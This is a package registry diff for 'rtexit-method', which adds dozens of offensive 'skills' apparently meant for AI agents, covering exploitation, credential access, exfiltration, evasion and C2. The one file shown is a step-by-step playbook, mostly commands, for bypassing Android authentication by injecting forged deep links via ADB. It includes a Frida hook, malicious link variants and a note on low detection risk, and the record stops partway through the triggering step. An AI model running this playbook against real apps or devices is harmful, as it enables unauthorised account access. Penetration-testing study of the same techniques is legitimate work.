rtexit-method 0.1.0 → 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +2 -5
- package/packaged-assets/.agents/skills/rt-active-recon/SKILL.md +767 -0
- package/packaged-assets/.agents/skills/rt-active-recon/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/customize.toml +76 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/customize.toml +67 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/customize.toml +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/SKILL.md +476 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/SKILL.md +1209 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/template.md +62 -0
- package/packaged-assets/.agents/skills/rt-autodoc/SKILL.md +258 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md +1072 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-compliance-mapper/SKILL.md +773 -0
- package/packaged-assets/.agents/skills/rt-create-sead/SKILL.md +74 -0
- package/packaged-assets/.agents/skills/rt-create-sead/template.md +89 -0
- package/packaged-assets/.agents/skills/rt-create-sead/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-credential-access/SKILL.md +756 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/SKILL.md +856 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/SKILL.md +542 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/cvss4-matrix.csv +20 -0
- package/packaged-assets/.agents/skills/rt-data-exfiltration/SKILL.md +784 -0
- package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md +987 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/SKILL.md +712 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/template.md +31 -0
- package/packaged-assets/.agents/skills/rt-executive-report/SKILL.md +718 -0
- package/packaged-assets/.agents/skills/rt-executive-report/template.md +38 -0
- package/packaged-assets/.agents/skills/rt-executive-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md +1078 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/ad-checklist.csv +12 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/SKILL.md +1329 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/masvs-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md +1547 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/SKILL.md +1949 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-bec/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/SKILL.md +865 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-azure/SKILL.md +1258 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-gcp/SKILL.md +981 -0
- package/packaged-assets/.agents/skills/rt-exploit-containers/SKILL.md +55 -0
- package/packaged-assets/.agents/skills/rt-exploit-databases/SKILL.md +1374 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-mac/SKILL.md +834 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/SKILL.md +903 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-dotnet/SKILL.md +945 -0
- package/packaged-assets/.agents/skills/rt-exploit-elasticsearch/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/SKILL.md +1023 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/SKILL.md +1576 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/payloads/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-firebase/SKILL.md +54 -0
- package/packaged-assets/.agents/skills/rt-exploit-frameworks/SKILL.md +967 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md +1693 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/SKILL.md +1860 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/payloads/sqlmap-tampers.txt +22 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/SKILL.md +1214 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/SKILL.md +91 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md +1009 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/SKILL.md +1327 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-mongodb/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-mssql/SKILL.md +52 -0
- package/packaged-assets/.agents/skills/rt-exploit-mysql/SKILL.md +53 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/SKILL.md +118 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-nodejs/SKILL.md +852 -0
- package/packaged-assets/.agents/skills/rt-exploit-osticket/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/SKILL.md +173 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/templates/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-php/SKILL.md +1119 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-postgresql/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md +986 -0
- package/packaged-assets/.agents/skills/rt-exploit-redis/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ruby/SKILL.md +61 -0
- package/packaged-assets/.agents/skills/rt-exploit-scada/SKILL.md +1091 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/SKILL.md +1528 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/payloads.txt +23 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/SKILL.md +121 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/scripts.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/SKILL.md +1902 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/owasp-checklist.csv +14 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-wireless/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/SKILL.md +1565 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/cves.csv +7 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/SKILL.md +1526 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/payloads.txt +18 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-document/SKILL.md +687 -0
- package/packaged-assets/.agents/skills/rt-finding-document/template.md +71 -0
- package/packaged-assets/.agents/skills/rt-finding-document/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/SKILL.md +216 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-help/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-help/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/SKILL.md +639 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/patterns.txt +27 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-kill-chain-map/SKILL.md +393 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/SKILL.md +1032 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/frameworks.csv +10 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/SKILL.md +668 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/tactics.csv +16 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-osint/SKILL.md +775 -0
- package/packaged-assets/.agents/skills/rt-osint/osint-sources.csv +12 -0
- package/packaged-assets/.agents/skills/rt-osint/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-party-mode/SKILL.md +249 -0
- package/packaged-assets/.agents/skills/rt-party-mode/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-persistence/SKILL.md +1146 -0
- package/packaged-assets/.agents/skills/rt-persistence/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-poc-writer/SKILL.md +640 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/SKILL.md +998 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/windows-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/SKILL.md +1027 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/win-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/SKILL.md +665 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/template.md +28 -0
- package/packaged-assets/.agents/skills/rt-risk-matrix/SKILL.md +232 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-scenario-c001/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c002/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-scenario-c003/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c004/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c005/SKILL.md +72 -0
- package/packaged-assets/.agents/skills/rt-scenario-d001/SKILL.md +378 -0
- package/packaged-assets/.agents/skills/rt-scenario-d002/SKILL.md +392 -0
- package/packaged-assets/.agents/skills/rt-scenario-d003/SKILL.md +522 -0
- package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md +373 -0
- package/packaged-assets/.agents/skills/rt-scenario-d005/SKILL.md +458 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/scenarios.csv +32 -0
- package/packaged-assets/.agents/skills/rt-scenario-m001/SKILL.md +796 -0
- package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md +723 -0
- package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md +463 -0
- package/packaged-assets/.agents/skills/rt-scenario-m004/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-m005/SKILL.md +505 -0
- package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md +573 -0
- package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md +112 -0
- package/packaged-assets/.agents/skills/rt-scenario-n003/SKILL.md +100 -0
- package/packaged-assets/.agents/skills/rt-scenario-n004/SKILL.md +90 -0
- package/packaged-assets/.agents/skills/rt-scenario-n005/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-w001/SKILL.md +635 -0
- package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md +612 -0
- package/packaged-assets/.agents/skills/rt-scenario-w003/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-w004/SKILL.md +648 -0
- package/packaged-assets/.agents/skills/rt-scenario-w005/SKILL.md +479 -0
- package/packaged-assets/.agents/skills/rt-scenario-w006/SKILL.md +443 -0
- package/packaged-assets/.agents/skills/rt-scenario-w007/SKILL.md +494 -0
- package/packaged-assets/.agents/skills/rt-scenario-w008/SKILL.md +576 -0
- package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md +518 -0
- package/packaged-assets/.agents/skills/rt-scenario-w010/SKILL.md +574 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/SKILL.md +79 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-shodan-recon/SKILL.md +880 -0
- package/packaged-assets/.agents/skills/rt-status/SKILL.md +64 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/SKILL.md +906 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-technical-report/SKILL.md +710 -0
- package/packaged-assets/.agents/skills/rt-technical-report/template.md +41 -0
- package/packaged-assets/.agents/skills/rt-technical-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-threat-model/SKILL.md +59 -0
- package/packaged-assets/.agents/skills/rt-threat-model/template.md +32 -0
- package/packaged-assets/.agents/skills/rt-threat-model/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-timeline/SKILL.md +338 -0
- package/packaged-assets/RTEXIT.md +127 -0
- package/tools/installer/lib/asset-manifest.js +10 -5
- package/tools/installer/lib/copy-assets.js +5 -2
- /package/{_rtexit → packaged-assets/_rtexit}/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/config.user.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/custom/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/autodoc_engine.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/finding_tracker.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_config.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_customization.py +0 -0
- /package/{resources → packaged-assets/resources}/certifications.md +0 -0
- /package/{resources → packaged-assets/resources}/payloads.md +0 -0
- /package/{resources → packaged-assets/resources}/tools.md +0 -0
- /package/{resources → packaged-assets/resources}/wordlists.md +0 -0
- /package/{templates → packaged-assets/templates}/attack-chain-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report.md +0 -0
- /package/{templates → packaged-assets/templates}/finding-template.md +0 -0
- /package/{templates → packaged-assets/templates}/remediation-roadmap.md +0 -0
- /package/{templates → packaged-assets/templates}/sead-template.md +0 -0
- /package/{templates → packaged-assets/templates}/technical-report.md +0 -0
|
@@ -0,0 +1,505 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: rt-scenario-m005
|
|
3
|
+
description: "M-005: Deep Link Injection → Authentication Bypass. Domain: mobile. Attack chain: find URL scheme in AndroidManifest → craft malicious deep link → trigger via ADB → bypass authentication flow → access protected screens. MITRE: T1626 → T1078. Real example: myapp://reset-password?token=INJECTED → triggers password reset without email verification"
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# M-005: Deep Link Injection → Authentication Bypass
|
|
7
|
+
|
|
8
|
+
## Overview
|
|
9
|
+
|
|
10
|
+
| Field | Value |
|
|
11
|
+
|---|---|
|
|
12
|
+
| Attack Objective | Bypass authentication flows by injecting crafted deep links into an Android application, gaining unauthorized access to protected screens or triggering privileged actions without proper credential verification |
|
|
13
|
+
| Required Access Level | None (physical/ADB) or Low (same-network attacker leveraging intent exposure) |
|
|
14
|
+
| Estimated Time to Execute | 30–90 minutes depending on obfuscation level and app complexity |
|
|
15
|
+
| Detection Risk Level | Low — ADB commands leave minimal traces; no network traffic generated during link injection; artifacts are in device logs only |
|
|
16
|
+
|
|
17
|
+
---
|
|
18
|
+
|
|
19
|
+
## Prerequisites
|
|
20
|
+
|
|
21
|
+
### Required Tools
|
|
22
|
+
|
|
23
|
+
```bash
|
|
24
|
+
# Android Debug Bridge (ADB) — included in Android SDK Platform Tools
|
|
25
|
+
# Download: https://developer.android.com/tools/releases/platform-tools
|
|
26
|
+
# macOS
|
|
27
|
+
brew install android-platform-tools
|
|
28
|
+
|
|
29
|
+
# Linux (Debian/Ubuntu)
|
|
30
|
+
sudo apt install adb
|
|
31
|
+
|
|
32
|
+
# Windows (via Chocolatey)
|
|
33
|
+
choco install adb
|
|
34
|
+
|
|
35
|
+
# Verify installation
|
|
36
|
+
adb version
|
|
37
|
+
|
|
38
|
+
# apktool — APK decompilation and resource extraction
|
|
39
|
+
# Download: https://apktool.org/
|
|
40
|
+
# macOS
|
|
41
|
+
brew install apktool
|
|
42
|
+
|
|
43
|
+
# Linux
|
|
44
|
+
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
|
|
45
|
+
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar -O apktool.jar
|
|
46
|
+
chmod +x apktool
|
|
47
|
+
sudo mv apktool /usr/local/bin/
|
|
48
|
+
sudo mv apktool.jar /usr/local/bin/
|
|
49
|
+
|
|
50
|
+
# jadx — Java/Kotlin decompiler for deeper source analysis
|
|
51
|
+
# https://github.com/skylot/jadx
|
|
52
|
+
# macOS
|
|
53
|
+
brew install jadx
|
|
54
|
+
|
|
55
|
+
# Linux
|
|
56
|
+
wget https://github.com/skylot/jadx/releases/latest/download/jadx-1.5.0.zip
|
|
57
|
+
unzip jadx-1.5.0.zip -d jadx
|
|
58
|
+
sudo ln -s $(pwd)/jadx/bin/jadx /usr/local/bin/jadx
|
|
59
|
+
|
|
60
|
+
# drozer — Android attack framework (optional, for intent fuzzing)
|
|
61
|
+
# https://github.com/WithSecureLabs/drozer
|
|
62
|
+
pip install drozer
|
|
63
|
+
|
|
64
|
+
# Frida — dynamic instrumentation (optional, for runtime bypass validation)
|
|
65
|
+
pip install frida-tools
|
|
66
|
+
```
|
|
67
|
+
|
|
68
|
+
### Required Access or Conditions
|
|
69
|
+
|
|
70
|
+
- Physical access to the Android device OR USB debugging enabled (ADB over USB)
|
|
71
|
+
- Alternatively: ADB over TCP/IP enabled on the target device (port 5555)
|
|
72
|
+
- APK accessible — either pulled from device or obtained from Play Store / APKPure
|
|
73
|
+
- Target application installed on the device
|
|
74
|
+
- USB debugging authorized (device trusted the host), OR ADB over network with known IP
|
|
75
|
+
|
|
76
|
+
### Skill Level
|
|
77
|
+
|
|
78
|
+
**INTERMEDIATE** — Requires familiarity with Android application structure, ADB, and basic reverse engineering. No exploit development required. Suitable for mobile penetration testers with basic Android knowledge.
|
|
79
|
+
|
|
80
|
+
---
|
|
81
|
+
|
|
82
|
+
## Attack Chain
|
|
83
|
+
|
|
84
|
+
```
|
|
85
|
+
[1] Enumerate URL schemes in AndroidManifest.xml
|
|
86
|
+
|
|
|
87
|
+
v
|
|
88
|
+
[2] Decompile APK → identify deep link handlers and intent filters
|
|
89
|
+
|
|
|
90
|
+
v
|
|
91
|
+
[3] Map deep link parameters → locate authentication checks in source
|
|
92
|
+
|
|
|
93
|
+
v
|
|
94
|
+
[4] Craft malicious deep link with injected/forged parameters
|
|
95
|
+
|
|
|
96
|
+
v
|
|
97
|
+
[5] Trigger via ADB am start → deliver intent to target activity
|
|
98
|
+
|
|
|
99
|
+
v
|
|
100
|
+
[6] Observe application response → confirm authentication bypass
|
|
101
|
+
|
|
|
102
|
+
v
|
|
103
|
+
[7] Access protected screen or trigger privileged action
|
|
104
|
+
```
|
|
105
|
+
|
|
106
|
+
**MITRE ATT&CK Chain:** T1626 (Abuse Elevation Control Mechanism) → T1078 (Valid Accounts — bypassing account authentication)
|
|
107
|
+
|
|
108
|
+
---
|
|
109
|
+
|
|
110
|
+
## Step-by-Step Execution
|
|
111
|
+
|
|
112
|
+
### Step 1: Pull the APK from the Device
|
|
113
|
+
|
|
114
|
+
```bash
|
|
115
|
+
# List installed packages to find the target
|
|
116
|
+
adb shell pm list packages | grep -i <appname>
|
|
117
|
+
|
|
118
|
+
# Example output:
|
|
119
|
+
# package:com.example.myapp
|
|
120
|
+
|
|
121
|
+
# Find the APK path on device
|
|
122
|
+
adb shell pm path com.example.myapp
|
|
123
|
+
|
|
124
|
+
# Example output:
|
|
125
|
+
# package:/data/app/~~randomstring==/com.example.myapp-base.apk
|
|
126
|
+
|
|
127
|
+
# Pull the APK to local machine
|
|
128
|
+
adb pull /data/app/~~randomstring==/com.example.myapp-base.apk ./target.apk
|
|
129
|
+
```
|
|
130
|
+
|
|
131
|
+
**Expected output:** `target.apk: 1 file pulled, 0 skipped.`
|
|
132
|
+
|
|
133
|
+
**Fallback:** If app is not extractable due to permissions, use a backup extraction method:
|
|
134
|
+
```bash
|
|
135
|
+
adb backup -noapk com.example.myapp
|
|
136
|
+
# Convert .ab backup to tar using Android Backup Extractor (ABE)
|
|
137
|
+
java -jar abe.jar unpack backup.ab backup.tar
|
|
138
|
+
tar -xf backup.tar
|
|
139
|
+
```
|
|
140
|
+
|
|
141
|
+
---
|
|
142
|
+
|
|
143
|
+
### Step 2: Decompile and Extract AndroidManifest.xml
|
|
144
|
+
|
|
145
|
+
```bash
|
|
146
|
+
# Decompile APK with apktool
|
|
147
|
+
apktool d target.apk -o ./decompiled_app
|
|
148
|
+
|
|
149
|
+
# Inspect AndroidManifest.xml
|
|
150
|
+
cat ./decompiled_app/AndroidManifest.xml
|
|
151
|
+
```
|
|
152
|
+
|
|
153
|
+
**Expected output:** Full manifest XML. Look for `<intent-filter>` blocks containing `<data android:scheme="...">`.
|
|
154
|
+
|
|
155
|
+
```xml
|
|
156
|
+
<!-- Example of what you are hunting for -->
|
|
157
|
+
<activity android:name=".ResetPasswordActivity">
|
|
158
|
+
<intent-filter>
|
|
159
|
+
<action android:name="android.intent.action.VIEW"/>
|
|
160
|
+
<category android:name="android.intent.category.DEFAULT"/>
|
|
161
|
+
<category android:name="android.intent.category.BROWSABLE"/>
|
|
162
|
+
<data android:scheme="myapp" android:host="reset-password"/>
|
|
163
|
+
</intent-filter>
|
|
164
|
+
</activity>
|
|
165
|
+
```
|
|
166
|
+
|
|
167
|
+
**Fallback:** If manifest is obfuscated or compressed, use jadx:
|
|
168
|
+
```bash
|
|
169
|
+
jadx -d ./jadx_output target.apk
|
|
170
|
+
cat ./jadx_output/resources/AndroidManifest.xml
|
|
171
|
+
```
|
|
172
|
+
|
|
173
|
+
---
|
|
174
|
+
|
|
175
|
+
### Step 3: Enumerate All Deep Link Schemes
|
|
176
|
+
|
|
177
|
+
```bash
|
|
178
|
+
# Quick grep for all scheme definitions in manifest
|
|
179
|
+
grep -i "scheme" ./decompiled_app/AndroidManifest.xml
|
|
180
|
+
|
|
181
|
+
# List all activities with BROWSABLE intent filters
|
|
182
|
+
grep -B 10 "BROWSABLE" ./decompiled_app/AndroidManifest.xml | grep "activity\|scheme\|host\|path"
|
|
183
|
+
|
|
184
|
+
# Search decompiled smali code for deep link handling
|
|
185
|
+
grep -r "getIntent\|getData\|getQueryParameter" ./decompiled_app/smali/ | head -30
|
|
186
|
+
|
|
187
|
+
# With jadx: search Java source for deep link parameter extraction
|
|
188
|
+
grep -r "getQueryParameter\|getPathSegments\|Uri.parse" ./jadx_output/sources/ | head -30
|
|
189
|
+
```
|
|
190
|
+
|
|
191
|
+
**Expected output:** List of URL schemes, hosts, and path patterns registered by the application.
|
|
192
|
+
|
|
193
|
+
| Scheme | Host | Path | Activity |
|
|
194
|
+
|---|---|---|---|
|
|
195
|
+
| myapp | reset-password | / | ResetPasswordActivity |
|
|
196
|
+
| myapp | dashboard | / | DashboardActivity |
|
|
197
|
+
| myapp | profile | /edit | ProfileEditActivity |
|
|
198
|
+
|
|
199
|
+
---
|
|
200
|
+
|
|
201
|
+
### Step 4: Analyze the Handler for Authentication Checks
|
|
202
|
+
|
|
203
|
+
```bash
|
|
204
|
+
# Locate the Java source of the target activity via jadx
|
|
205
|
+
find ./jadx_output/sources -name "ResetPasswordActivity*"
|
|
206
|
+
|
|
207
|
+
# Review the onCreate / onNewIntent handler
|
|
208
|
+
cat ./jadx_output/sources/com/example/myapp/ResetPasswordActivity.java
|
|
209
|
+
```
|
|
210
|
+
|
|
211
|
+
**What to look for — secure vs. vulnerable pattern:**
|
|
212
|
+
|
|
213
|
+
```java
|
|
214
|
+
// VULNERABLE: Trusts token from URI without server-side verification
|
|
215
|
+
@Override
|
|
216
|
+
protected void onCreate(Bundle savedInstanceState) {
|
|
217
|
+
super.onCreate(savedInstanceState);
|
|
218
|
+
Uri data = getIntent().getData();
|
|
219
|
+
String token = data.getQueryParameter("token");
|
|
220
|
+
// Token is used directly to proceed without verification
|
|
221
|
+
proceedWithReset(token);
|
|
222
|
+
}
|
|
223
|
+
|
|
224
|
+
// SECURE: Would validate token server-side before proceeding
|
|
225
|
+
// validateTokenWithServer(token, callback)
|
|
226
|
+
```
|
|
227
|
+
|
|
228
|
+
**Fallback:** If source is heavily obfuscated, use Frida to hook `getQueryParameter` at runtime:
|
|
229
|
+
```bash
|
|
230
|
+
frida -U -n com.example.myapp -e "
|
|
231
|
+
Java.perform(function() {
|
|
232
|
+
var Uri = Java.use('android.net.Uri');
|
|
233
|
+
Uri.getQueryParameter.implementation = function(key) {
|
|
234
|
+
var result = this.getQueryParameter(key);
|
|
235
|
+
console.log('[*] getQueryParameter(' + key + ') = ' + result);
|
|
236
|
+
return result;
|
|
237
|
+
};
|
|
238
|
+
});
|
|
239
|
+
"
|
|
240
|
+
```
|
|
241
|
+
|
|
242
|
+
---
|
|
243
|
+
|
|
244
|
+
### Step 5: Craft the Malicious Deep Link
|
|
245
|
+
|
|
246
|
+
Based on analysis, construct the deep link with injected parameters:
|
|
247
|
+
|
|
248
|
+
```
|
|
249
|
+
myapp://reset-password?token=INJECTED_TOKEN
|
|
250
|
+
```
|
|
251
|
+
|
|
252
|
+
**Variations to test:**
|
|
253
|
+
|
|
254
|
+
```bash
|
|
255
|
+
# Forged token — test with arbitrary string
|
|
256
|
+
myapp://reset-password?token=aaaaaaaaaaaaaaaaaaaaaaaa
|
|
257
|
+
|
|
258
|
+
# Token of zero length (empty bypass)
|
|
259
|
+
myapp://reset-password?token=
|
|
260
|
+
|
|
261
|
+
# Null byte injection
|
|
262
|
+
myapp://reset-password?token=%00
|
|
263
|
+
|
|
264
|
+
# Parameter pollution
|
|
265
|
+
myapp://reset-password?token=valid&token=INJECTED
|
|
266
|
+
|
|
267
|
+
# Path traversal in host/path
|
|
268
|
+
myapp://reset-password/../dashboard
|
|
269
|
+
|
|
270
|
+
# Accessing authenticated screen directly (no token at all)
|
|
271
|
+
myapp://dashboard
|
|
272
|
+
|
|
273
|
+
# Accessing admin/privileged screens
|
|
274
|
+
myapp://admin/panel
|
|
275
|
+
myapp://settings/export-data
|
|
276
|
+
```
|
|
277
|
+
|
|
278
|
+
---
|
|
279
|
+
|
|
280
|
+
### Step 6: Trigger Deep Link via ADB
|
|
281
|
+
|
|
282
|
+
```bash
|
|
283
|
+
# Primary method: adb shell am start with deep link URI
|
|
284
|
+
adb shell am start \
|
|
285
|
+
-a android.intent.action.VIEW \
|
|
286
|
+
-d "myapp://reset-password?token=INJECTED_TOKEN" \
|
|
287
|
+
com.example.myapp
|
|
288
|
+
|
|
289
|
+
# Specify the exact component to bypass intent routing
|
|
290
|
+
adb shell am start \
|
|
291
|
+
-a android.intent.action.VIEW \
|
|
292
|
+
-d "myapp://reset-password?token=INJECTED_TOKEN" \
|
|
293
|
+
-n com.example.myapp/.ResetPasswordActivity
|
|
294
